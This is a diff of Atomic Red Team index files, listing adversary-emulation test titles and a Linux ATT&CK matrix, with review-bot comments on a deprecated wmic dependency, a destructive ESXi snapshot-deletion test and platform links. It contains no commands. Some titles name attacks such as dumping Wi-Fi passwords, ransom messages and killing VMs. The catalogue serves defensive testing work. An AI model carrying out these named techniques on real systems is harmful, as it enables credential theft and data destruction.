- Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
@@ -1760,6 +1780,8 @@
- Atomic Test #36: Display volume shadow copies with "vssadmin" [windows]
- Atomic Test #37: Identify System Locale and Regional Settings with PowerShell [windows]
- Atomic Test #38: Enumerate Available Drives via gdr [windows]
- Atomic Test #39: Discover OS Product Name via Registry [windows]
- Atomic Test #40: Discover OS Build Number via Registry [windows]
- [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
- Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
@@ -1832,6 +1854,8 @@
- Atomic Test #2: Discover System Language with chcp [windows]
- Atomic Test #7: Discover System Language with dism.exe [windows]
- Atomic Test #8: Discover System Language by Windows API Query [windows]
- Atomic Test #9: Discover System Language with WMIC [windows]
- Atomic Test #10: Discover System Language with Powershell [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- Atomic Test #2: Query Registry with Powershell cmdlets [windows]
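Review bot: test #9 "Discover System Language with WMIC" depends on wmic.exe, which Microsoft has deprecated and which is no longer installed by default on current Windows 11 builds; the test needs a dependency check so it is skipped rather than failing, and #10 "Discover System Language with Powershell" is the variant that will keep working.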
@@ -1889,6 +1913,7 @@
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
- Atomic Test #5: System Time with Windows time Command [windows]
- Atomic Test #6: Discover System Time Zone via Registry [windows]
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1912,6 +1937,7 @@
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- Atomic Test #3: ESXi - Change Welcome Message on Direct Console User Interface (DCUI) [windows]
- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
@@ -1929,6 +1955,7 @@
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- Atomic Test #5: ESXi - Delete VM Snapshots [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
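Review bot: T1485 test #5 "ESXi - Delete VM Snapshots" is destructive with no undo; gate it on an explicit VM name input argument rather than enumerating every VM on the host, and state in the description that it must only run against a disposable lab hypervisor.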
@@ -1950,6 +1977,7 @@
- Atomic Test #12: Logoff System - Windows [windows]
- Atomic Test #13: ESXi - Terminates VMs using pkill [windows]
- Atomic Test #14: ESXi - Avoslocker enumerates VMs and forcefully kills VMs [windows]
- Atomic Test #15: ESXi - vim-cmd Used to Power Off VMs [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
+4 -4
@@ -3,7 +3,7 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -12,9 +12,9 @@
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
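Review bot: the two replaced rows in this hunk (the row whose first two cells are Valid Accounts / Inter-Process Communication, and the row starting Compromise Software Supply Chain / Exploitation for Client Execution) each differ from their original in exactly one cell: the Command and Control cell goes from `Protocol Tunneling [CONTRIBUTE A TEST]` to `[Protocol Tunneling](../../T1572/T1572.md)`, and the Exfiltration cell goes from `Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST]` to `[Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)`; every other cell is byte-identical, so the whole diff is those two new links. In this table a link means a test exists for the platform the matrix covers (the surrounding rows are the Linux ones: Cron, Systemd Timers, LD_PRELOAD, Rc.common), so the check before merging is that the T1572 and T1567.002 atomics this build picked up actually declare that platform in their supported_platforms list rather than being pulled in by a platform list that was widened by hand; a link to a test that cannot run on the platform is worse than the CONTRIBUTE A TEST placeholder. Pre-existing naming inconsistency visible in the same hunk, not introduced here: the T1048.002 cell reads `Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol` with a dash, while its sibling T1048.003 and the new T1567.002 cell use the `Technique: Sub-technique` form; that should be normalised where the display name is defined, not in this generated index.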
@@ -30,7 +30,7 @@
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
